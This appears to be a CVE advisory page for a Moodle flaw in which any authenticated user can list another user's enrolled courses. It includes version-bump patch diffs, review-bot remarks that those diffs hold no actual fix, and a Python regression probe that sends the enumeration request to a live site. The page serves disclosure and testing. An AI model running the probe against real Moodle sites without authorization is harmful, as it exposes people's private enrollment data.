VYPR
Moderate severity · NVD Advisory · Published Mar 15, 2021 · Updated Aug 3, 2024

CVE-2021-20283

Description

Moodle's web service for fetching enrolled courses lacked permission checks, allowing unauthorized users to view course enrollments.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

Overview

The web service endpoint that returns another user's enrolled courses did not check, per course, that the requesting user was permitted to view the target user's profile in that course. With that check missing, authentication alone was enough to obtain the list. Moodle versions prior to 3.10.2, 3.9.5, 3.8.8 and 3.5.17 are affected [1][2].

Exploitation

An attacker who can call the web service sends a request naming a target user's ID. Because the service did not verify the requester's profile-access rights in each course, the response listed every course the target user was enrolled in, including courses the attacker was not enrolled in and could not otherwise see [2].

Impact

The vulnerability lets any authenticated user enumerate other users' course enrollments, revealing information about a person's learning activities and affiliations. That is useful for reconnaissance (for example, finding which accounts share a course, or which staff are enrolled in a restricted training) and for inferring private details about individuals [1].

Mitigation

The issue is fixed in Moodle 3.10.2, 3.9.5, 3.8.8 and 3.5.17; upgrade to one of these or a later release. No workaround has been published, so until the upgrade is applied the exposure is bounded only by who can authenticate to the site and reach the web service endpoint [1][2].

AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package         Ecosystem   Affected versions     Patched version
moodle/moodle   Packagist   >= 3.10.0, < 3.10.2   3.10.2
moodle/moodle   Packagist   >= 3.9.0, < 3.9.5     3.9.5
moodle/moodle   Packagist   >= 3.8.0, < 3.8.8     3.8.8
moodle/moodle   Packagist   < 3.5.17              3.5.17

The 3.6 and 3.7 branches fall between the listed ranges and have no patched version here; a site on either branch should be treated as affected and moved to a patched branch.

Affected products

3

Patches

4
15f3dddd042a

Moodle release 3.10.2

https://github.com/moodle/moodle · Eloy Lafuente (stronk7) · Mar 6, 2021 · via osv
1 file changed · +2 −2
  • version.php (+2 −2, modified)
    @@ -29,9 +29,9 @@
     
     defined('MOODLE_INTERNAL') || die();
     
    -$version  = 2020110901.10;              // 20201109      = branching date YYYYMMDD - do not modify!
    +$version  = 2020110902.00;              // 20201109      = branching date YYYYMMDD - do not modify!
                                             //         RR    = release increments - 00 in DEV branches.
                                             //           .XX = incremental changes.
    -$release  = '3.10.1+ (Build: 20210305)';// Human-friendly version name
    +$release  = '3.10.2 (Build: 20210308)';// Human-friendly version name
     $branch   = '310';                      // This version's branch.
     $maturity = MATURITY_STABLE;             // This version's maturity level.
    
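Review bot: this hunk changes only $version (2020110901.10 to 2020110902.00) and $release ('3.10.1+' to '3.10.2 (Build: 20210308)'); it adds no authorization check to the enrolled-courses web service, so it cannot be the fix for CVE-2021-20283 and should not be listed as such. Link the commit that modifies the web service handler, or label this entry as the 3.10.2 release marker so a reader does not mistake a version bump for the patch.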
02a2e649e92d

Moodle release 3.9.5

https://github.com/moodle/moodle · Eloy Lafuente (stronk7) · Mar 6, 2021 · via osv
1 file changed · +2 −2
  • version.php (+2 −2, modified)
    @@ -29,9 +29,9 @@
     
     defined('MOODLE_INTERNAL') || die();
     
    -$version  = 2020061504.09;              // 20200615      = branching date YYYYMMDD - do not modify!
    +$version  = 2020061505.00;              // 20200615      = branching date YYYYMMDD - do not modify!
                                             //         RR    = release increments - 00 in DEV branches.
                                             //           .XX = incremental changes.
    -$release  = '3.9.4+ (Build: 20210305)'; // Human-friendly version name
    +$release  = '3.9.5 (Build: 20210308)'; // Human-friendly version name
     $branch   = '39';                       // This version's branch.
     $maturity = MATURITY_STABLE;             // This version's maturity level.
    
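Review bot: nothing in this diff touches permission logic; the only edits are $version (2020061504.09 to 2020061505.00) and $release ('3.9.4+' to '3.9.5 (Build: 20210308)'). A reviewer cannot confirm from these lines that 3.9.5 carries the per-course check the advisory describes. The patch entry for the 3.9 branch needs the commit that changes the web service, with this bump at most as a secondary reference.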
6f7e3ca2f7e8

Moodle release 3.8.8

https://github.com/moodle/moodle · Eloy Lafuente (stronk7) · Mar 6, 2021 · via osv
1 file changed · +2 −2
  • version.php (+2 −2, modified)
    @@ -29,9 +29,9 @@
     
     defined('MOODLE_INTERNAL') || die();
     
    -$version  = 2019111807.01;              // 20191118      = branching date YYYYMMDD - do not modify!
    +$version  = 2019111808.00;              // 20191118      = branching date YYYYMMDD - do not modify!
                                             //         RR    = release increments - 00 in DEV branches.
                                             //           .XX = incremental changes.
    -$release  = '3.8.7+ (Build: 20210305)'; // Human-friendly version name
    +$release  = '3.8.8 (Build: 20210308)'; // Human-friendly version name
     $branch   = '38';                       // This version's branch.
     $maturity = MATURITY_STABLE;             // This version's maturity level.
    
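Review bot: the 3.8 entry is a release bump only ($version 2019111807.01 to 2019111808.00, $release '3.8.7+' to '3.8.8 (Build: 20210308)') and contains none of the code the "What the fix does" section says is required. If this is the only reference for the 3.8 branch, the advisory should say so explicitly and point at the security commit, otherwise anyone backporting or verifying the fix will find nothing to diff against.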
5a1b6a9d50f5

Moodle release 3.5.17

https://github.com/moodle/moodle · Eloy Lafuente (stronk7) · Mar 6, 2021 · via osv
1 file changed · +2 −2
  • version.php (+2 −2, modified)
    @@ -29,11 +29,11 @@
     
     defined('MOODLE_INTERNAL') || die();
     
    -$version  = 2018051716.01;              // 20180517      = branching date YYYYMMDD - do not modify!
    +$version  = 2018051717.00;              // 20180517      = branching date YYYYMMDD - do not modify!
                                             //         RR    = release increments - 00 in DEV branches.
                                             //           .XX = incremental changes.
     
    -$release  = '3.5.16+ (Build: 20210305)'; // Human-friendly version name
    +$release  = '3.5.17 (Build: 20210308)'; // Human-friendly version name
     
     $branch   = '35';                       // This version's branch.
     $maturity = MATURITY_STABLE;             // This version's maturity level.
    
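Review bot: as with a plain release tag, this hunk only moves $version (2018051716.01 to 2018051717.00) and $release ('3.5.16+' to '3.5.17 (Build: 20210308)'); the enrolled-courses web service is not touched. Since 3.5 is the oldest branch listed and the one most likely to be patched by hand, the entry should reference the commit that adds the per-course authorization check rather than this version bump.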

Vulnerability mechanics

Root cause

"Missing authorization check in the web service that fetches other users' enrolled courses allows an authenticated user to view enrollment data without permission."

Attack vector

An attacker can invoke the web service that retrieves another user's enrolled courses without proper authorization checks [CWE-862]. The service fails to validate that the requesting user has permission to view course enrollment information for the target user in each course. This allows an authenticated attacker to enumerate the courses in which any other user is enrolled, bypassing the intended access controls [ref_id=1].

Affected code

The vulnerability exists in the web service responsible for fetching other users' enrolled courses. The advisory does not specify the exact file or function name, but the issue is in the authorization logic of that service endpoint [ref_id=1].

What the fix does

The supplied patches only bump version.php for each affected branch (3.10.2, 3.9.5, 3.8.8, 3.5.17) and do not contain the code fix [patch_id=2271473][patch_id=2271472][patch_id=2271471][patch_id=2271470]. The advisory cites a Moodle forum discussion (https://moodle.org/mod/forum/discuss.php?d=419654) as the vendor advisory and patch source [ref_id=1]. A correct fix adds an authorization check to the web service handler so that, for each course in the result, the requesting user is verified to have permission to view the target user's enrollment in that course; being authenticated is not sufficient on its own.

Preconditions

  • auth: the attacker must be an authenticated Moodle user
  • network: the vulnerable web service endpoint must be reachable by the attacker
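A regression check for the request pattern described under Exploitation and Attack vector, added here as an example; it is not Moodle's code and not part of the advisory. It assumes, because the page does not name the endpoint, that the function is core_enrol_get_users_courses reached over Moodle's REST protocol (`/webservice/rest/server.php` with `wstoken`, `wsfunction`, `moodlewsrestformat=json` and `userid`), that a success reply is a JSON list of course records with an `id`, and that a refusal is a JSON object carrying `exception`, `errorcode` and `message`. The sample replies in the block are constructed, not captured from a real site. The check keys on course ids the requester is known not to be allowed to see, because an empty or short list on its own proves nothing either way.

```python
"""Regression probe for CVE-2021-20283 (Moodle enrolled-courses web service).

Added example, not Moodle's code.  Assumed (the advisory does not name the
endpoint): the function is core_enrol_get_users_courses, called through
Moodle's REST protocol at /webservice/rest/server.php with the parameters
wstoken, wsfunction, moodlewsrestformat=json and userid.  A success reply is
a JSON list of course records (each with an "id"); a refusal is a JSON object
carrying "exception", "errorcode" and "message".
"""
import json
import sys
import urllib.parse
import urllib.request

WSFUNCTION = "core_enrol_get_users_courses"   # assumption, see docstring


def build_request(base_url: str, token: str, target_userid: int):
    """Return (url, form_body) for asking the service about target_userid.

    The requester's identity comes only from the token; nothing in the
    request proves a right to see target_userid's enrolments, so the server
    must enforce that per course.  The token travels in the POST body, not
    the query string, so it does not land in access logs.
    """
    url = base_url.rstrip("/") + "/webservice/rest/server.php"
    form = {
        "wstoken": token,
        "wsfunction": WSFUNCTION,
        "moodlewsrestformat": "json",
        "userid": str(target_userid),
    }
    return url, urllib.parse.urlencode(form).encode()


def assess(body, requester_userid: int, target_userid: int, hidden_course_ids):
    """Judge one reply.

    hidden_course_ids: courses target_userid is enrolled in that the requester
    is NOT permitted to see.  If any of them come back, the per-course check
    described in the advisory is absent.
    """
    if isinstance(body, dict) and "exception" in body:
        return {"verdict": "denied", "errorcode": body.get("errorcode", "")}
    if not isinstance(body, list):
        return {"verdict": "unexpected", "body": body}
    returned = sorted({int(c["id"]) for c in body if "id" in c})
    if requester_userid == target_userid:
        # Asking about yourself is always allowed; says nothing about the bug.
        return {"verdict": "self", "returned": returned}
    leaked = sorted(set(returned) & set(hidden_course_ids))
    return {
        "verdict": "vulnerable" if leaked else "ok",
        "leaked": leaked,
        "returned": returned,
    }


def probe(base_url, token, requester_userid, target_userid, hidden_course_ids,
          timeout=10):
    """Send the request to a live site and assess the reply (needs network)."""
    url, data = build_request(base_url, token, target_userid)
    with urllib.request.urlopen(url, data=data, timeout=timeout) as resp:
        body = json.load(resp)
    return assess(body, requester_userid, target_userid, hidden_course_ids)


# Constructed sample replies (not captured from a real site), shaped as the
# docstring assumes.  SAMPLE_LEAK is what an unpatched site would return when
# a requester with no access to course 7 asks about user 9.
SAMPLE_LEAK = [
    {"id": 2, "shortname": "CHEM101", "fullname": "Introductory Chemistry"},
    {"id": 7, "shortname": "HR-CASE", "fullname": "HR case review (restricted)"},
]
SAMPLE_DENIED = {
    "exception": "required_capability_exception",
    "errorcode": "nopermissions",
    "message": "Sorry, but you do not currently have permissions to do that",
}


def demo():
    """Offline walk-through over the constructed samples."""
    return {
        "unpatched": assess(SAMPLE_LEAK, 5, 9, hidden_course_ids=[7]),
        "refused": assess(SAMPLE_DENIED, 5, 9, hidden_course_ids=[7]),
    }


if __name__ == "__main__":
    # usage: probe.py BASE_URL TOKEN REQUESTER_ID TARGET_ID HIDDEN_IDS(comma-sep)
    if len(sys.argv) == 6:
        base, token, me, target, hidden = sys.argv[1:]
        result = probe(base, token, int(me), int(target),
                       [int(x) for x in hidden.split(",") if x])
    else:
        result = demo()
    print(json.dumps(result, indent=2))
```

Run it with a token for an ordinary account and a target user who is known to sit in at least one course that account cannot see. An unpatched site returns those course ids (verdict "vulnerable"); a patched site either refuses the call or omits the hidden courses from the list (verdict "ok"). Treat "ok" with an empty `returned` list as inconclusive until you have confirmed the target really is enrolled in the hidden courses.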

Generated on May 24, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

8
